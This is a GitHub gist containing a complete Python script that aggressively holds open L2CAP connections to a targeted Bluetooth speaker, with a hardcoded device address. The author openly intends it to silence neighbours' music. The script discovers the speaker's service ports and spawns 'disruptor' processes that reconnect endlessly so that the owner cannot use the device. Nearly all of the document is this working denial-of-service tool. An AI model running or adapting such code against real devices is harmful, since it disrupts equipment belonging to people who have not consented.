Skip to content

Instantly share code, notes, and snippets.

@icedraco
Last active April 26, 2020 11:17
Show Gist options
  • Save icedraco/41fa34ca2c9401270eb816ac42249be7 to your computer and use it in GitHub Desktop.
Save icedraco/41fa34ca2c9401270eb816ac42249be7 to your computer and use it in GitHub Desktop.
Designed to aggressively hold an open connection to a Bluetooth speaker
# Bluetooth Speaker Hogging Script
#
# Designed to aggressively hold an open connection to a Bluetooth speaker.
#
# Particularly useful for when your neighbors have an "incompatible" taste in
# music and don't consider it a problem that they play it too loud.
#
# Requirements:
# sudo apt install libbluetooth-dev
# python3.7 -m pip install pybluez
from time import sleep
from multiprocessing import current_process, Process, Queue
from datetime import datetime
from typing import List
import bluetooth as bt
# Bluetooth device address of the speaker that main() targets.
TARGET_BDADDR = 'A4:77:58:04:C6:C7' # Anker SoundCore
# PSM (port) values to connect to. While this list is empty, main() keeps
# running service discovery against TARGET_BDADDR until something is found.
TARGET_PSM_LIST = [] # if you know the value(s) in advance, this will spare
# us the discovery run!
# Service class identifier passed as the `uuid` filter by discover_psm().
# reference: https://www.bluetooth.com/specifications/assigned-numbers/service-discovery/
SVC_CLASS_AUDIO_SINK = '110B'
def main() -> int:
    """
    Resolve the target's PSM list (discovering it if none is preconfigured),
    start one disruptor process per PSM and wait for all of them to exit.

    :return: exit code for the script (always 0)
    """
    log = mklog('main')

    target_bdaddr: str = TARGET_BDADDR
    target_psms: List[int] = TARGET_PSM_LIST

    # Keep polling service discovery until the target reports at least one port.
    while not target_psms:
        log(f'discovering target PSM (port) for {target_bdaddr}...')
        target_psms = discover_psm_debug(target_bdaddr)
        if target_psms:
            log('PSM FOUND:')
            for p in target_psms:
                log(f' * {target_bdaddr} -> {p}')
            log()
        else:
            sleep(0.5)

    log('starting disruptors...')
    disruptor_procs = [start_disruptor(target_bdaddr, psm) for psm in target_psms]

    while True:
        try:
            # Plain loop: join() is called for its side effect only, so there
            # is no point in collecting its return values into a list.
            for proc in disruptor_procs:
                proc.join()
            break
        except KeyboardInterrupt:
            # CTRL+C interrupted a join(): go around again and keep waiting
            # for the sub-processes to close.
            pass

    log('shutdown complete')
    return 0
def p_disrupt(bdaddr: str, psm: int):
    """
    Disruptor process body: connect to the given L2CAP PSM, log whatever the
    peer sends, and reconnect whenever the connection ends or fails.

    Runs until interrupted with CTRL+C. Exceptions other than
    ``BluetoothError`` and ``KeyboardInterrupt`` are not handled here and
    propagate to the caller.

    :param bdaddr: Bluetooth address of the target host
    :param psm: Bluetooth PSM (L2CAP port) to connect to
    """
    log = mklog()
    log(f'Attempting to capture {bdaddr} (PSM {psm})...')

    # The KeyboardInterrupt handler wraps the whole reconnect loop so that a
    # CTRL+C arriving outside the connect/recv section (socket creation, the
    # retry sleep, close()) also results in a clean shutdown.
    try:
        while True:
            s = bt.BluetoothSocket(bt.L2CAP)
            try:
                s.connect((bdaddr, psm))
                log(f'CONNECTED TO {bdaddr} (PSM {psm})')

                while True:
                    data = s.recv(1024)  # blocking call
                    if not data:
                        # empty read: stop receiving and reconnect
                        break
                    log(f'[{len(data)} bytes] {repr(data)}')

            except bt.btcommon.BluetoothError as ex:
                log(ex)
                sleep(0.1)  # short pause before the next connection attempt

            finally:
                # always release the socket before reconnecting or exiting
                s.close()

    except KeyboardInterrupt:
        log('CTRL+C -> SHUTTING DOWN...')

    log('disruptor shut down')
def discover_psm(bdaddr: str) -> List[int]:
    """
    Query the host at the given address for its AudioSink service records
    and collect the port (L2CAP PSM) of each one.

    :param bdaddr: Bluetooth address of the host we are probing
    :return: list of discovered PSM values
    """
    audio_sinks = bt.find_service(uuid=SVC_CLASS_AUDIO_SINK, address=bdaddr)
    return [record['port'] for record in audio_sinks]
def discover_psm_debug(bdaddr: str) -> List[int]:
    """
    Debug flavour of PSM discovery: look up every service on the host
    (no service-class filter), print each record and return all their ports.

    :param bdaddr: Bluetooth address of the host we are probing
    :return: the 'port' value of every service record found
    """
    records = bt.find_service(address=bdaddr)

    # dump the raw records first so they can be inspected by eye
    for record in records:
        print(f' * {record!r}')

    return [record['port'] for record in records]
def start_disruptor(bdaddr: str, psm: int) -> Process:
    """
    Launch a daemon process running p_disrupt against one Bluetooth service.

    :param bdaddr: Bluetooth address of the target host
    :param psm: Bluetooth PSM (L2CAP port)
    :return: Disruptor process (already started)
    """
    worker = Process(
        target=p_disrupt,
        name=f'DISRUPTOR-{psm}',  # process name doubles as the log tag in mklog()
        args=(bdaddr, psm),
        daemon=True,
    )
    worker.start()
    return worker
def mklog(name: str = ''):
    """
    Build a logging function that prefixes every line with a timestamp and a
    fixed tag.

    :param name: tag to show in the prefix; when empty, the name of the
                 current process (at the time mklog is called) is used
    :return: function ``log(msg='')`` that prints ``[<now>][<name>] <msg>``
    """
    name = name or current_process().name

    # msg is typed as object rather than str: callers also pass exception
    # instances, which the f-string renders via str().
    def log(msg: object = ''):
        """Print one log line; the timestamp is taken at call time."""
        print(f'[{datetime.now()}][{name}] {msg}')

    return log
# Script entry point: run main() and hand its return value to the interpreter
# as the process exit status.
if __name__ == '__main__':
    exit_status = main()
    raise SystemExit(exit_status)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment